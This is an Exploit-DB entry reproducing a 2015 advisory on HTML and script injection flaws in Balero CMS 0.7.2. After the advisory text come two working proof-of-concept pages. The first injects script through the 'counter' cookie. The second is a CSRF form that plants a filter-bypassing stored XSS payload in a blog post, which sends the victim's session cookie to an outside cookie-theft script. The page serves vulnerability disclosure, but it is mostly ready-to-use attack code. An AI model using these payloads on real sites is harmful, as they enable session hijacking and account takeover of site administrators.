Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities

EDB-ID:

36676

CVE:





Platform:

PHP

Date:

2015-04-08


<!--

Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities

Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2

Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.

Desc: Input passed to the 'content' POST parameter and the cookie 'counter'
is not properly sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in context of an affected site.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5239
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5239.php


04.03.2015

-->


<html>
  <body>
    <script>
      document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/";
    </script>
  </body>
</html>


csrf+stored xss+filter bypass+session hijack:

<html>
  <body>
    <form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST">
      <input type="hidden" name="title" value="ZSL" />
      <input type="hidden" name="content" value="pwned&lt;/textarea&gt;<s\cript>document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;</s\cript>" />
      <input type="hidden" name="files" value="joxy.poxy" />
      <input type="hidden" name="delete_post[]" value="135" />
      <input type="hidden" name="id" value="135" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>